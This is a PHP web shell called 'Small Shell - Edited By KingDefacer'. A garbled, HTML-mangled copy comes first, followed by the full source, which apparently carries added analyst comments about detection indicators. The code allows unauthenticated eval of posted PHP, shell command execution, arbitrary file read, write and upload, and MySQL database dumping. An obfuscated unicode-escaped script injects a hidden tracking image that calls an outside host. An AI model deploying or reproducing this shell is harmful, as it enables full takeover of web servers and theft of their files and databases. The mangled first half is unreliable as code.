echo($head.$pages);
?&gt;
<hr>
<form method="post">
<textarea cols="120" rows="20" name="eval_value">&lt;?@eval($eval_value);?&gt;</textarea>
<input name="action" value="eval" type="submit">
<input name="action" value="eval_in_html" type="submit">
<input name="page" value="eval" type="hidden">
</form>
<hr>
<!--?
}
break;
}
case 'cmd':
{
$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
$action=isset($_POST['action'])?$_POST['action']:'cmd';
if(@is_dir($work_dir))
{
@chdir($work_dir);
$work_dir=getcwd();
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
}
else if(file_exists($work_dir))$work_dir=realpath($work_dir);
$work_dir=str_replace('\\','/',$work_dir);
$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
switch($action)
{
case 'cmd' :
{
echo($head.$pages);
?-->
<form method="post" name="main_form">
<input name="work_dir" value="" type="text" size="120">
<input name="page" value="cmd" type="hidden">
<input type="submit" value="go">
</form>
<form method="post">
<input name="cmd" type="text" size="120" value="">
<input name="work_dir" type="hidden">
<input name="page" value="cmd" type="hidden">
<input name="action" value="cmd" type="submit" onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method="post" enctype="multipart/form-data">
<input type="file" name="filename">
<input name="work_dir" type="hidden">
<input name="page" value="cmd" type="hidden">
<input name="action" value="upload" type="submit" onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method="post">
<input name="fname" type="text" size="120"><br>
<input name="archive" type="radio" value="none">without arch
<input name="archive" type="radio" value="gzip" checked="true">gzip archive
<input name="work_dir" type="hidden">
<input name="page" value="cmd" type="hidden">
<input name="action" value="download" type="submit" onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<pre><!--?
if($cmd!==''){ echo('<strong-->'.htmlspecialchars($cmd)."<hr>\n<textarea cols="120" rows="20">\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
else
{
$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
if(@is_dir($work_dir))
{
echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
$handle=@opendir($work_dir);
if($handle)
{
while(false!==($fn=readdir($handle))){$files[]=$fn;};
@closedir($handle);
sort($files);
$not_dirs=array();
for($i=0;$i<sizeof($files);$i++) {="" $fn="$files[$i];" if(is_dir($fn))="" echo('<a="" href="\'#\'" onclick="\'document.list.work_dir.value=&quot;'.$e_work_dir.str_replace('&quot;','&quot;',$fn).'&quot;;document.list.submit();\'"><b>'.htmlspecialchars(strlen($fn)&gt;format?substr($fn,0,format-3).'...':$fn).'</b>'.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
else {$not_dirs[]=$fn;}
}
for($i=0;$i<sizeof($not_dirs);$i++) {="" $fn="$not_dirs[$i];" echo('<a="" href="\'#\'" onclick="\'document.list.work_dir.value=&quot;'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('&quot;','&quot;',$fn)).'&quot;;document.list.submit();\'">'.htmlspecialchars(strlen($fn)&gt;format?substr($fn,0,format-3).'...':$fn).''.str_repeat(' ',format-strlen($fn))); 
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
echo('</sizeof($not_dirs);$i++)></sizeof($files);$i++)></pre><hr>');
?&gt;
<form name="list" method="post">
<input name="work_dir" type="hidden" size="120"><br>
<input name="page" value="cmd" type="hidden">
<input name="f_action" value="view" type="hidden">
</form>
<!--?
} else echo('Error Listing '.$e_work_dir);
}
else
switch($f_action)
{
case 'view':
{
echo('<strong-->'.$e_work_dir." Edit<hr><pre>\n");
$f=@fopen($work_dir,'r');
?&gt;
<form method="post">
<textarea name="file_text" cols="120" rows="20">&lt;?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?&gt;</textarea>
<input name="page" value="cmd" type="hidden">
<input name="work_dir" type="hidden" value="" size="120">
<input name="f_action" value="save" type="submit">
</form>
<!--?
break;
}
case 'save' :
{
$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
$f=@fopen($work_dir,'w');
if(!($f))echo('<strong-->Error '.$e_work_dir."<hr><pre>\n");
else
{
fwrite($f,$file_text);
fclose($f);
echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
}
break;
}
}
break;
}
break;
}
case 'upload' :
{
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
$f=$_FILES["filename"]["name"];
if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
else
{
echo('file is uploaded in '.$e_work_dir);
}
break;
}
case 'download' :
{
$fname=isset($_POST['fname'])?$_POST['fname']:'';
$temp_file=isset($_POST['temp_file'])?'on':'nn';
$f=@fopen($fname,'r');
if(!($f)) echo('file is not exists');
else
{
$archive=isset($_POST['archive'])?$_POST['archive']:'';
if($archive=='gzip')
{
Header("Content-Type:application/x-gzip\n");
$s=gzencode(fread($f,filesize($fname)));
Header('Content-Length: '.strlen($s)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
echo($s);
}
else
{
Header("Content-Type:application/octet-stream\n");
Header('Content-Length: '.filesize($fname)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
ob_start();
while(feof($f)===false)
{
echo(fread($f,10000));
ob_flush();
}
}
}
}
}
break;
}
case 'mysql' :
{
$action=isset($_POST['action'])?$_POST['action']:'query';
$user=isset($_POST['user'])?$_POST['user']:'';
$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
$db=isset($_POST['db'])?$_POST['db']:'';
$host=isset($_POST['host'])?$_POST['host']:'localhost';
$query=isset($_POST['query'])?magic_q($_POST['query']):'';
switch($action)
{
case 'dump' :
{
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
if($archive!=='none')$to_file=false;
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
else
{
$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
ob_start();
if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
if($table_dump=='')
{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$result=mysql_query('show tables',$mysql_link);
for($i=0;$i<mysql_num_rows($result);$i++) {="" $rows="mysql_fetch_array($result);" $result2="@mysql_query('show" columns="" from="" `'.$rows[0].'`',$mysql_link);="" if(!$result2)$dump_file.="#error table " .$rows[0];="" else="" $dump_file.="create table `" .$rows[0]."`(\n";="" for($j="0;$j<mysql_num_rows($result2)-1;$j++)" $rows2="mysql_fetch_array($result2);" .$rows2[0].'`="" '.$rows2[1].($rows2[2]="='NO'&amp;&amp;$rows2[4]!='NULL'?'" not="" null="" default="" \''.$rows2[4].'\'':'="" null').",\n";="" }="" null')."\n";="" $type[$j]="$rows2[1];" ;="" mysql_free_result($result2);="" *="" $columns="$j-1;" .$rows[0].'`="" values="" (';="" for($k="0;$k<$columns;$k++)" if($archive="='none')" if($to_file)="" {fwrite($t_f,$dump_file);fflush($t_f);}="" echo($dump_file);="" ob_flush();="" $dump_file="" mysql_free_result($result);="" if($archive!="none" )="" header('content-length:="" '.strlen($dump_file)."\n");="" if($t_f)="" fclose($t_f);="" echo('dump="" for="" '.$db_dump.'="" now="" in="" '.$to_file);="" `'.$table_dump.'`',$mysql_link);="" if(!$result2)echo('error="" table="" '.$table_dump);="" if(!$to_file)="" header('content-type:="" application="" x-'.($archive="='none'?'octet-stream':'gzip').&quot;\n&quot;);" header("content-disposition:="" attachment;="" filename="\&quot;dump_{$db_dump}.sql&quot;.($archive=='none'?'':'.gz').&quot;\&quot;\n\n&quot;);" if($to_file="==false)" .$table_dump.'`="" echo="" $dump_file;="" }else="" break;="" case="" 'query'="" :="" echo($head.$pages);="" ?="">
<hr>
<form method="post">
<table>
<tbody><tr><td>
<textarea name="query" cols="120" rows="20"></textarea><table align="left">
<tbody><tr><td>User :<input name="user" type="text" value=""></td><td>Passwd :<input name="passwd" type="text" value=""></td><td>Host :<input name="host" type="text" value=""></td><td>DB :<input name="db" type="text" value=""></td></tr>
<tr></tr>
</tbody></table>
</td>
<td>
<input name="archive" type="radio" value="none">without arch
<input name="archive" type="radio" value="gzip" checked="true">gzip archive
<table>
<tbody><tr><td>DB :</td><td><input type="text" name="db_dump" value=""></td></tr>
<tr><td>Only Table :</td><td><input type="text" name="table_dump"></td></tr>
<tr><td><input type="submit" name="action" value="dump"></td></tr>
<tr><td>Save result to :</td><td><input type="text" name="to_file" value="" size="23"></td></tr>
</tbody></table>
</td>
</tr></tbody></table>
<input name="page" value="mysql" type="hidden">
<input name="action" value="query" type="submit">
</form>
<hr>
<!--?
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$result=@mysql_query($query,$mysql_link);
if(!($result))echo(mysql_error());
else
{
echo("<table valign=top align=left-->\n");
for($i=0;$i<mysql_num_fields($result);$i++) echo('<td=""><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  ');
echo("\n\n");
for($i=0;$i<mysql_num_rows($result);$i++) {="" $rows="mysql_fetch_array($result);" echo('<tr="" valign="top" align="left">');
for($j=0;$j<mysql_num_fields($result);$j++) {="" echo('<td="">'.(htmlspecialchars($rows[$j])).'');
}
echo("\n");
}
echo("\n");
}
mysql_close($mysql_link);
}
break;
}
}
break;
}
}
?&gt;

<h1>Edited By KingDefacer</h1><h1>
<script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script><img src="http://alturks.com/snf/s.php" width="1" height="1"></h1></mysql_num_fields($result);$j++)></mysql_num_rows($result);$i++)></mysql_num_fields($result);$i++)></mysql_num_rows($result);$i++)></pre></pre></pre></headka></body></html>

Original PHP code

<?
  ##########################################################
 # Small Shell - Edited By KingDefacer                      #
 #  +POST method                                            #
 #  +MySQL Client+Dumper for DB  and tables                 #
 #  +PHP eval in text format and html for phpinfo() example #
 # PREVED: sn0w, Zadoxlik, KingDefacer, Rebz, SkvoznoY      #
 # All bugs -> alturks.com                                  #
 # Just for fun :)                                          #
  ##########################################################
// Runtime setup: report every PHP error level and remove the script execution time limit.
// The leading @ silences the warning PHP raises if the host forbids changing the limit.
error_reporting(E_ALL);
@set_time_limit(0);
// Undo magic_quotes_gpc escaping on a request value.
// Returns $s unchanged when get_magic_quotes_gpc() reports the setting as off.
function magic_q($s)
{
    if (!get_magic_quotes_gpc()) {
        return $s;
    }
    // Escaped sequence and its literal form, index-aligned. The order matters:
    // each replacement runs on the result of the previous one.
    $escaped = array('\\\'', '\\\\', '\\"', '\\\0');
    $literal = array('\'', '\\', '"', '\0');
    foreach ($escaped as $idx => $needle) {
        $s = str_replace($needle, $literal[$idx], $s);
    }
    return $s;
}
// Render the nine owner/group/other permission bits of $fn as an "rwxrwxrwx"-style string,
// with '-' for every bit that is not set. The mode comes from fileperms($fn).
function get_perms($fn)
{
    $bits = fileperms($fn);
    $letters = 'rwxrwxrwx';
    $out = '';
    // Walk from the owner-read bit (0400) down to the other-execute bit (01).
    for ($pos = 0; $pos < 9; $pos++) {
        $mask = 0400 >> $pos;
        $out .= ($bits & $mask) ? $letters[$pos] : '-';
    }
    return $out;
}
// Shared HTML prologue (title, charset declaration, inline CSS). The 'eval', 'cmd' and 'mysql' query views echo it before their forms.
$head=<<<headka
<html>
<head>
<title>Small Shell - Edited By KingDefacer</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
<style>
textarea {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
input {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
</style>
headka;
// Page selection: POST 'page' wins, otherwise the raw query string is used (the nav links below use ?mysql and ?eval).
// No credential, session or source-address check appears before the dispatch anywhere in this listing.
$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
// Allow-list: any value other than 'cmd', 'mysql' or 'eval' is coerced to 'cmd'.
$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
// $winda stays false when php_uname() does not contain 'wind'; the script treats that as "not Windows".
$winda=strpos(strtolower(php_uname()),'wind');
// Column width used when padding or truncating file names in the directory listing.
define('format',50);
// Navigation bar. On hosts treated as non-Windows this line also runs `id` through the backtick (shell) operator
// on every request, so a web-server child process executing `id` is a host-side indicator for this sample.
$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
// Top-level dispatch on the requested page ('eval', 'cmd' or 'mysql').
switch($page)
{
// 'eval' page: POST 'eval_value' is handed to eval(), i.e. request-supplied PHP runs inside the web application.
// All parameters travel in the POST body, so URL-only access logs will not show what was submitted.
case 'eval':
{
$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
// Undo magic-quotes escaping so the submitted text reaches eval() unmodified.
$eval_value=magic_q($eval_value);
$action=isset($_POST['action'])?$_POST['action']:'eval';
// 'eval_in_html': the evaluated code's output is the whole response body, without the page chrome.
// The @ suppresses errors raised by the evaluated code.
if($action=='eval_in_html') @eval($eval_value);
else
{
echo($head.$pages);
?>
<hr>
<form method=post>
<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
<input name='action' value='eval' type='submit'>
<input name='action' value='eval_in_html' type='submit'>
<input name='page' value='eval' type=hidden>
</form>
<hr>
<?
}
break;
}
// 'cmd' page: command execution plus a file manager (list, view, save, upload, download).
case 'cmd':
{
// Command line to run, taken from POST 'cmd' with magic-quotes escaping undone.
$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
// Target path for the file operations; defaults to the script's current directory.
$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
$action=isset($_POST['action'])?$_POST['action']:'cmd';
if(@is_dir($work_dir))
{
// Directory: make it the process working directory and normalise it to end with a path separator.
@chdir($work_dir);
$work_dir=getcwd();
if($work_dir=='')$work_dir='/';
// NOTE(analysis): the $str{n} offset syntax below was removed in PHP 8, so the file as listed
// is expected to fail to parse there — confirm against the interpreter on the affected host.
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
}
// Existing non-directory path: resolve it to an absolute path.
else if(file_exists($work_dir))$work_dir=realpath($work_dir);
$work_dir=str_replace('\\','/',$work_dir);
// HTML-escaped copy used wherever the path is echoed back into the page.
$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
// Second-level dispatch inside the 'cmd' page: 'cmd' (default), 'upload' or 'download'.
switch($action)
{
// Default action: render the forms, then either run a command or show the file manager.
case 'cmd' :
{
echo($head.$pages);
?>
<form method='post' name='main_form'>
<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
<input name='page' value='cmd' type=hidden>
<input type=submit value='go'>
</form>
<form method=post>
<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'>
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post enctype="multipart/form-data">
<input type="file" name="filename">
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post>
<input name='fname' type=text size=120><br>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<pre>
<?
// Command execution: the backtick operator passes $cmd to the system shell (equivalent to shell_exec).
// The command and its output are HTML-escaped before display. Host telemetry showing shells or
// utilities spawned by the PHP / web-server process is the main detection point for this branch.
if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
else
{
// No command given: act as a file manager on $work_dir. 'f_action' selects view (default) or save.
$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
if(@is_dir($work_dir))
{
echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
$handle=@opendir($work_dir);
if($handle)
{
while(false!==($fn=readdir($handle))){$files[]=$fn;};
@closedir($handle);
sort($files);
$not_dirs=array();
// First pass: print directories. is_dir($fn) receives the bare entry name, so it resolves
// against the working directory set by the earlier chdir().
for($i=0;$i<sizeof($files);$i++)
{
$fn=$files[$i];
if(is_dir($fn))
{
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
// Owner and group names are looked up only on hosts treated as non-Windows.
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
else {$not_dirs[]=$fn;}
}
// Second pass: every entry that was not a directory. For symlinks the click target is built from readlink().
for($i=0;$i<sizeof($not_dirs);$i++)
{
$fn=$not_dirs[$i];
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); 
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
echo('</pre><hr>');
?>
<form name='list' method=post>
<input name='work_dir' type=hidden size=120><br>
<input name='page' value='cmd' type=hidden>
<input name='f_action' value='view' type=hidden>
</form>
<?
} else echo('Error Listing '.$e_work_dir);
}
else
switch($f_action)
{
// 'view': show the file at $work_dir in an editable textarea, HTML-escaped and read in 100000-byte chunks.
case 'view':
{
echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
$f=@fopen($work_dir,'r');
?>
<form method=post>
<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
<input name='page' value='cmd' type=hidden>
<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
<input name='f_action' value='save' type=submit>
</form>
<?
break;
}
// 'save': overwrite the file at $work_dir with POST 'file_text' — an arbitrary file write with the
// web server's permissions. Unexpected modification times on web-root files are worth checking.
case 'save' :
{
$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
$f=@fopen($work_dir,'w');
if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
else
{
fwrite($f,$file_text);
fclose($f);
echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
}
break;
}
}
break;
}
break;
}
// 'upload' action: stores the uploaded file under $work_dir using the client-supplied file name.
case 'upload' :
{
// Make sure the destination directory string ends with a path separator.
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
// The name is taken straight from the multipart request; no extension or path filtering is applied.
$f=$_FILES["filename"]["name"];
// copy() from PHP's temporary upload path. Failures are silenced by @ and reported only as a generic message.
if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
else
{
echo('file is uploaded in '.$e_work_dir);
}
break;
}
// 'download' action: opens the server path given in POST 'fname' and returns it as an attachment,
// i.e. an arbitrary file read limited only by the web server's file permissions.
case 'download' :
{
$fname=isset($_POST['fname'])?$_POST['fname']:'';
// $temp_file is assigned here but not read anywhere else in the listing.
$temp_file=isset($_POST['temp_file'])?'on':'nn';
$f=@fopen($fname,'r');
if(!($f)) echo('file is not exists');
else
{
$archive=isset($_POST['archive'])?$_POST['archive']:'';
if($archive=='gzip')
{
// gzip branch: the whole file is read into memory and compressed before being sent.
Header("Content-Type:application/x-gzip\n");
$s=gzencode(fread($f,filesize($fname)));
Header('Content-Length: '.strlen($s)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
echo($s);
}
else
{
// Raw branch: streamed in 10000-byte reads. The file handle is never closed explicitly.
Header("Content-Type:application/octet-stream\n");
Header('Content-Length: '.filesize($fname)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
ob_start();
while(feof($f)===false)
{
echo(fread($f,10000));
ob_flush();
}
}
}
}
}
break;
}
// 'mysql' page: database client and dumper. Connection parameters, target database and the SQL text
// all come from the POST body; only the host has a default ('localhost').
// NOTE(analysis): the mysql_* calls used on this page belong to the legacy ext/mysql API, which was
// removed in PHP 7.0 — confirm the interpreter version when judging whether this page could have worked.
case 'mysql' :
{
$action=isset($_POST['action'])?$_POST['action']:'query';
$user=isset($_POST['user'])?$_POST['user']:'';
$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
$db=isset($_POST['db'])?$_POST['db']:'';
$host=isset($_POST['host'])?$_POST['host']:'localhost';
$query=isset($_POST['query'])?magic_q($_POST['query']):'';
// Second-level dispatch inside the 'mysql' page: 'dump' or 'query' (default).
switch($action)
{
// 'dump': exports a whole database, or a single table, as SQL text. The result is sent as a download
// (optionally gzip-compressed) or written to a server-side path given in POST 'to_file'.
case 'dump' :
{
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
// $to_file is false unless a non-empty path was posted; it is forced back to false whenever an archive format is selected.
$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
if($archive!=='none')$to_file=false;
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
// Request-supplied table name; it is concatenated into backtick-quoted identifiers below without escaping.
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
else
{
$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
ob_start();
// Server-side output file: opened for writing (truncating) at a request-chosen path; the script dies if the open fails.
if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
// Empty table name: dump every table returned by 'show tables'.
if($table_dump=='')
{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$result=mysql_query('show tables',$mysql_link);
for($i=0;$i<mysql_num_rows($result);$i++)
{
$rows=mysql_fetch_array($result);
$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
if(!$result2)$dump_file.='#error table '.$rows[0];
else
{
// Rebuild a CREATE TABLE statement from 'show columns'. All columns but the last are emitted in the
// loop; the last one is handled afterwards so that it carries no trailing comma.
$dump_file.='create table `'.$rows[0]."`(\n";
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
}
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
// $type is written here but not read anywhere in the listing.
$type[$j]=$rows2[1];
$dump_file.=");\n";
mysql_free_result($result2);
$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
// $columns is the index of the last column; it is used below to close each INSERT statement.
$columns=$j-1;
for($j=0;$j<mysql_num_rows($result2);$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='insert into `'.$rows[0].'` values (';
for($k=0;$k<$columns;$k++)
{
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
}
$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
// Uncompressed mode flushes after every row (to the file or to the client); gzip mode keeps accumulating in $dump_file.
if($archive=='none')
{
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
else
{
echo($dump_file);
ob_flush();
}
$dump_file='';
}
}
mysql_free_result($result2);
}
}
mysql_free_result($result);
if($archive!='none')
{
$dump_file=gzencode($dump_file);
header('Content-Length: '.strlen($dump_file)."\n");
echo($dump_file);
}
else if($t_f)
{
fclose($t_f);
echo('Dump for '.$db_dump.' now in '.$to_file);
}
}
else
{
// Single-table dump: same procedure as above, applied to the posted table name only.
$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
if(!$result2)echo('error table '.$table_dump);
else
{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
// Second header block: sets Content-Disposition again, this time with the table name in the file name.
if($to_file===false)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$dump_file.="create table `{$table_dump}`(\n";
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
}
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
$type[$j]=$rows2[1];
$dump_file.=");\n";
mysql_free_result($result2);
$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
$columns=$j-1;
for($j=0;$j<mysql_num_rows($result2);$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='insert into `'.$table_dump.'` values (';
for($k=0;$k<$columns;$k++)
{
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
}
